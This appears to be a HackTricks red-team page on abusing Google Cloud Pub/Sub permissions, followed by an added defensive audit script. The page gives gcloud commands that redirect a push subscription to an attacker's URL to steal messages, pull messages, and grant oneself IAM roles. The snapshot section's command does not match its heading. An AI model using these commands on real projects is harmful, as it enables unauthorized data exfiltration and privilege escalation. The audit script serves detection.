GCP - Pubsub Privesc

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

PubSub

For more information, see:

GCP - Pub/Sub Enum

pubsub.snapshots.create (pubsub.topics.attachSubscription)

Topic snapshots contain the current unACKed messages and every message after them. You can create a snapshot of a topic to access all of its messages while avoiding direct access to the topic.

gcloud pubsub subscriptions create <subscription_name> --topic <topic_name> --push-endpoint https://<URL_to_push_to>

pubsub.snapshots.setIamPolicy

Assign the previous permissions to yourself.

pubsub.subscriptions.create

You can create a push subscription on a topic that will send every message it receives to the specified URL.

pubsub.subscriptions.update

Set your own URL as the push endpoint to steal the messages.

pubsub.subscriptions.consume

Access the messages using the subscription.

gcloud pubsub subscriptions pull <SUBSCRIPTION> \
--limit=50 \
--format="json" \
--project=<PROJECTID>

pubsub.subscriptions.setIamPolicy

Assign yourself any of the previous permissions.

# Add Binding
gcloud pubsub subscriptions add-iam-policy-binding <SUBSCRIPTION_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub subscriptions remove-iam-policy-binding <SUBSCRIPTION_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Change Policy
gcloud pubsub subscriptions set-iam-policy <SUBSCRIPTION_NAME> \
<(echo '{
"bindings": [
{
"role": "<ROLE_OR_CUSTOM_ROLE>",
"members": [
"serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
]
}
]
}') \
--project=<PROJECT_ID>
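
A defensive check for the changes these permissions allow, added here as an example that is not part of the original page: it reviews a subscription inventory for push endpoints on unexpected hosts and for IAM bindings that name unexpected members. The JSON samples, the host allowlist and the member names are constructed assumptions, shaped like the output of `gcloud pubsub subscriptions list --format=json` and `gcloud pubsub subscriptions get-iam-policy`.

```python
import json
from urllib.parse import urlparse

# Constructed sample shaped like `gcloud pubsub subscriptions list --format=json`.
SUBSCRIPTIONS_JSON = """[
  {"name": "projects/example-proj/subscriptions/orders-worker",
   "topic": "projects/example-proj/topics/orders", "pushConfig": {}},
  {"name": "projects/example-proj/subscriptions/orders-hook",
   "topic": "projects/example-proj/topics/orders",
   "pushConfig": {"pushEndpoint": "https://hooks.internal.example.com/orders"}},
  {"name": "projects/example-proj/subscriptions/tmp-debug",
   "topic": "projects/example-proj/topics/orders",
   "pushConfig": {"pushEndpoint": "https://collector.example.net/in"}}
]"""

WORKER = "serviceAccount:worker@example-proj.iam.gserviceaccount.com"

# Constructed sample: one `get-iam-policy` result per subscription name.
POLICIES = {
    "projects/example-proj/subscriptions/orders-worker": {
        "bindings": [{"role": "roles/pubsub.subscriber", "members": [WORKER]}]},
    "projects/example-proj/subscriptions/tmp-debug": {
        "bindings": [{"role": "roles/pubsub.subscriber",
                      "members": ["allAuthenticatedUsers"]}]},
}

ALLOWED_PUSH_HOSTS = {"hooks.internal.example.com"}  # assumption: approved receivers
EXPECTED_MEMBERS = {WORKER}                          # assumption: approved principals


def audit(subscriptions, policies, allowed_hosts, expected_members):
    """Return (subscription, finding_type, detail) tuples for review."""
    findings = []
    for sub in subscriptions:
        name = sub["name"]
        # Pull subscriptions have an empty or missing pushConfig.
        endpoint = (sub.get("pushConfig") or {}).get("pushEndpoint")
        if endpoint and urlparse(endpoint).hostname not in allowed_hosts:
            findings.append((name, "push-endpoint", endpoint))
        for binding in policies.get(name, {}).get("bindings", []):
            for member in binding.get("members", []):
                if member not in expected_members:
                    detail = f"{binding['role']} -> {member}"
                    findings.append((name, "iam-member", detail))
    return findings


if __name__ == "__main__":
    subs = json.loads(SUBSCRIPTIONS_JSON)
    for finding in audit(subs, POLICIES, ALLOWED_PUSH_HOSTS, EXPECTED_MEMBERS):
        print(*finding, sep="\t")
```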
